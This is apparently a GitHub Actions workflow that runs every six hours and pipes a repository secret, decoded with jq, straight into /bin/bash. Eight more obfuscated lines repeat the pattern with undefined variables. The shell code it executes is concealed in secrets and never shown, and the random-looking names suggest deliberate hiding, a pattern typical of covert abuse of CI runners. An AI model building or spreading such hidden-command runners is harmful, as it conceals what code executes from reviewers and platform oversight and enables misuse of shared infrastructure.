name: huangganling2003
on:
  workflow_dispatch:
  schedule:
    - cron: '57 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangganling2003
        env:
          g75673: ${{ secrets.g75673 }}
        run: |
          echo $g75673 | jq -r .rrofa310 | /bin/bash
          echo $vjs1403 | jq -r .qfsex7736 | /bin/bash
          echo $b8293 | jq -r .qa4 | /bin/bash
          echo $pz7 | jq -r .jzy2 | /bin/bash
          echo $bdey073 | jq -r .tts9055 | /bin/bash
          echo $retqi3 | jq -r .qn5141 | /bin/bash
          echo $u52970 | jq -r .g15 | /bin/bash
          echo $mdvsc4404 | jq -r .vt79 | /bin/bash
          echo $biw016 | jq -r .tg945 | /bin/bash

